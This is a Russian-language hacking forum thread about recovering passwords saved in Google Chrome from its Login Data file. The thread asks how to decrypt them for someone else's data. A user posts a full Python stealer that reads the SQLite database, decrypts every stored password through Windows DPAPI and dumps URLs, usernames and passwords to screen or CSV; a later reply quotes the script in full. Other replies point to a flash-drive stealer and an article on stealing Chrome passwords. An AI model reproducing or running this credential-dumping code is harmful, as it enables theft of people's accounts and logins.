Просмотр полной версии : Можно ли узнать пароли Chrome имея доступ к файлам?
Где-то вычитал, что файлы от Google Chrome хранятся в файле Login Data, который находится здесь:
AppData\Local\Google\Chrome\User Data\Default
Может ли человек заменить эти файлы у себя на ПК и увидеть мои пароли в настройках Chrome?
Troy Silvani
17.11.2016, 02:44
меня тоже мучает этот вопрос, а если быть конкретнее - ВОЗМОЖНО ЛИ РАСШИФРОВАТЬ СТРОКУ ПАРОЛЯ ИЛИ BLOB значение ??? Судя по статье хабра ,эта строка заширована в битах...если так ,то есть исходник для расшифровки битов с БД SQL3 типа. ...это для меня уже дело принципа...в одном месте пишут что возможно ...в другом что не возможно....ХОЧЕТСЯ ИСТИНЫ!!)
Истина в том, что ВОЗМОЖНО.
Turanchocks_
18.11.2016, 10:59
1st: "No system is safe"
2nd: "Aim for the impossible"
3rd: "Have fun in cyberspace and meatspace"
Troy Silvani
11.12.2016, 01:43
↑ (https://antichat.live/posts/4014376/)
Истина в том, что ВОЗМОЖНО.
подскажи как??? дай хоть какую нибудь зацепку для дальнейшего поиска моего ...или утилиту ..вообще было б огненно)
winstrool
11.12.2016, 09:36
Troy Silvani said:
↑ (https://antichat.live/posts/4023090/)
подскажи как??? дай хоть какую нибудь зацепку для дальнейшего поиска моего ...или утилиту ..вообще было б огненно)
вот скриптик, только хром должен быть закрытым для его работы:
#gets saved passwords from Chrome
#need to get Pywin32 python extension for t his to work
import os
from sys importexit
import sqlite3
from win32crypt import CryptUnprotectData
import argparse
def chromepath():
PathName=os.getenv('localappdata') +'\\Google\\Ch rome\\User Data\\Default\\'
if (os.path.isdir(PathName) ==False):
print('Chrome not found')
#exit(0)
returnPathName
def main():
secret= []
path=chromepath()
#path = "C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\Us er Data\\Default\\"
try:
connection=sqlite3.connect(path+"Login Data")
#connection = sqlite3.connect("C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\Us er Data\\Default\\" + "Login Data")
with connection:
cursor=connection.cursor()
v=cursor.execute('SELECT action_url, username_va lue, password_value FROM logins')
value=v.fetchall()
fori in value:
password=CryptUnprotectData(i[2],None,None,None,0)[1]
ifpassword:
secret.append({
'url':i[0],
'username':i[1],
'password':str(password)
})
except sqlite3.OperationalErrorase:
if (str(e) =='database is locked'):
print('Google Chr ome can\'t be running at the same time')
exit(0)
elif(str(e) =='no such table: logins'):
print('Could not find database name')
exit(0)
elif(str(e) =='unable to open database file') :
print('Could not find database path')
exit(0)
else:
print(e)
exit(0)
ifsecret== []:
print('no passwords saved in C hrome')
else:
returnsecret
def csv(info):
with open('chromepasswordlist.csv','wb') asresul t:
result.write('url,username,password \n'.encode('u tf-8'))
fordata in info:
result.write(('%s, %s, %s \n'% (data['url'],data['username'],data['password'])).encode('utf-8'))
def args_parser():
parser=argparse.ArgumentParser(description="gets Chrome saved passwords")
parser.add_argument("-csv",help="Output to csv",action="store_true")
args=parser.parse_args()
ifargs.csv:
csv(main())
else:
fordata in main():
print(data)
print(password)
if__name__=='__main__':
args_parser()
там в соседних файлах и хистори можете посмотреть, аналогичная ситуация с оперой, с фаером не разбирался....
WallHack
17.12.2016, 14:33
[/URL][URL="https://www.hackzone.ru/forum/open/id/22216/"]Флешка стиллер (https://www.hackzone.ru/forum/open/id/22216/)
Troy Silvani
30.01.2017, 03:35
↑ (https://antichat.live/posts/4023124/)
вот скриптик, только хром должен быть закрытым для его работы:
#gets saved passwords from Chrome
#need to get Pywin32 python extension for t his to work
import os
from sys importexit
import sqlite3
from win32crypt import CryptUnprotectData
import argparse
def chromepath():
PathName=os.getenv('localappdata') +'\\Google\\Ch rome\\User Data\\Default\\'
if (os.path.isdir(PathName) ==False):
print('Chrome not found')
#exit(0)
returnPathName
def main():
secret= []
path=chromepath()
#path = "C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\Us er Data\\Default\\"
try:
connection=sqlite3.connect(path+"Login Data")
#connection = sqlite3.connect("C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\Us er Data\\Default\\" + "Login Data")
with connection:
cursor=connection.cursor()
v=cursor.execute('SELECT action_url, username_va lue, password_value FROM logins')
value=v.fetchall()
fori in value:
password=CryptUnprotectData(i[2],None,None,None,0)[1]
ifpassword:
secret.append({
'url':i[0],
'username':i[1],
'password':str(password)
})
except sqlite3.OperationalErrorase:
if (str(e) =='database is locked'):
print('Google Chr ome can\'t be running at the same time')
exit(0)
elif(str(e) =='no such table: logins'):
print('Could not find database name')
exit(0)
elif(str(e) =='unable to open database file') :
print('Could not find database path')
exit(0)
else:
print(e)
exit(0)
ifsecret== []:
print('no passwords saved in C hrome')
else:
returnsecret
def csv(info):
with open('chromepasswordlist.csv','wb') asresul t:
result.write('url,username,password \n'.encode('u tf-8'))
fordata in info:
result.write(('%s, %s, %s \n'% (data['url'],data['username'],data['password'])).encode('utf-8'))
def args_parser():
parser=argparse.ArgumentParser(description="gets Chrome saved passwords")
parser.add_argument("-csv",help="Output to csv",action="store_true")
args=parser.parse_args()
ifargs.csv:
csv(main())
else:
fordata in main():
print(data)
print(password)
if__name__=='__main__':
args_parser()
там в соседних файлах и хистори можете посмотреть, аналогичная ситуация с оперой, с фаером не разбирался....
спасибо друг, через какую прогу ее реализовать надо? borland не распознает команды
winstrool
30.01.2017, 11:36
через питон, прицепи алгоритм переписать можно на любом языке....
https://codeby.net/forum/threads/voruem-paroli-iz-google-chrome.58962/ - вот глянь статейку мою, гугл необязательно должен быть закрыт. Идея в том что протокол DPAPI который использует гугл для шифрования может расшифрован только на той машине на которой они были зашифрованы. Код там целый. Но как замечено переписать на чем угодно можно.
binarymaster
30.01.2017, 23:31
↑ (https://antichat.live/posts/4023124/)
только хром должен быть закрытым для его работы
Насколько я понимаю, эти файлы можно скопировать в другое место, даже при запущенном хроме. И после натравить скрипт на копии файлов.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot